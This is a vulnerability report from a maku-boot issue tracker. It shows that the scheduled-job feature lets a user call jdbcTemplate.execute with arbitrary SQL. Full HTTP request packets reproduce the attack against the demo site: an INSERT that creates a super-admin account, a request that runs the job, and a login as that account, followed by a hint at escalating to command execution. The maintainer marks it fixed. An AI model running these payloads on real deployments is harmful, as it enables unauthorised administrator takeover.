2K Star 11.4K Fork 4.8K

MAKU / maku-boot

 / 详情

Any sql statement execution vulnerability

已完成
创建于  
2022-11-07 16:16

Impact

version:maku-boot v1.3.0-v2.2.0
Users with "schedule" permissions can execute arbitrary sql statements, even rce

Code Audit

The vulnerability code is located at:

  1. https://github.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
  2. https://gitee.com/makunet/maku-boot/blob/master/maku-boot-module/maku-module-quartz/src/main/java/net/maku/quartz/utils/AbstractScheduleJob.java
    输入图片说明

Need to find an exploitable method that satisfies the following conditions:

  • The class that defines the method is in the spring bean container.
  • The method has only one parameter, and the parameter type must be a string.
  • The method must be public.

Deploy maku-boot locally and write auxiliary code to find a method that meets the above conditions:
输入图片说明

Visit http://localhost:8080/index
输入图片说明

Find org.springframework.jdbc.core.JdbcTemplate#execute(java.lang.String) method, this method can perform any SQL statement
The next section is the exploit procedure

Steps to reproduce

Visit the official demo site: https://demo.maku.net/maku-boot/#/login

  1. Log in as user name 'admin' and password 'admin'.
    输入图片说明

  2. Go to https://demo.maku.net/maku-boot/#/quartz/schedule/index and add timing task after a successful login.
    Click the Add button in the image below.
    输入图片说明

Fill in the following important parameters and click the submit button in the image below:

  • bean name: jdbcTemplate
  • method name: execute
  • method param: INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());

输入图片说明

The packet is as follows:

POST /maku-boot-server/schedule HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 583
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":"","jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":""}
  1. Click the run button in the image below to execute the scheduled task you just created.
    输入图片说明

The packet is as follows:

PUT /maku-boot-server/schedule/run HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 618
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
Authorization: 06f170e5cdbf4c83b5e3ba5ffc4cde98
Content-Type: application/json;charset=UTF-8
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"id":24,"jobName":"test","jobGroup":"default","beanName":"jdbcTemplate","method":"execute","params":"INSERT INTO sys_user (id, username, password, real_name, avatar, gender, email, mobile, status, org_id, super_admin, version, deleted, creator, create_time, updater, update_time) VALUES (10099, 'test123', '{bcrypt}$2a$10$mW/yJPHjyueQ1g26WNBz0uxVPa0GQdJO1fFZmqdkqgMTGnyszlXxu', 'test', 'https://cdn.maku.net/images/avatar.png', 0, 'babamu@126.cn', '13612345586', 1, null, 1, 0, 0, 10000, now(), 10000, now());","cronExpression":"* * * * * ? *","status":0,"concurrent":1,"remark":"","createTime":"2022-11-07 11:23:34"}

After the sql statement is successfully executed, an administrator user test123/admin is created

  1. Log in to the system as test123/admin
    输入图片说明

The packet is as follows:

POST /maku-boot-server/sys/auth/login HTTP/1.1
Host: demo.maku.net
Cookie: Hm_lvt_dd01f60c05c4a94d3287dd7c580372ff=1667440588; Hm_lpvt_dd01f60c05c4a94d3287dd7c580372ff=1667468738
Content-Length: 104
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.maku.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.maku.net/maku-boot/
Accept-Encoding: gzip, deflate
Connection: close

{"username":"test123","password":"admin","key":"30aef83e-2804-49ea-acb5-b5678cdc27dc","captcha":"bdrgr"}

Login successful
输入图片说明

In addition, any sql statements can be executed, and the maku-boot program supports mysql and postgresql databases. Therefore, the udf may upgrade permissions and execute commands

评论 (1)

TGAO 创建了任务
TGAO 修改了描述
展开全部操作日志

已修复,感谢

阿沐 任务状态从 待办的 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
8562901 baba alex 1621242500 7554608 h3110n3w0r11d 1670478742
Java
1
https://gitee.com/makunet/maku-boot.git
git@gitee.com:makunet/maku-boot.git
makunet
maku-boot
maku-boot

搜索帮助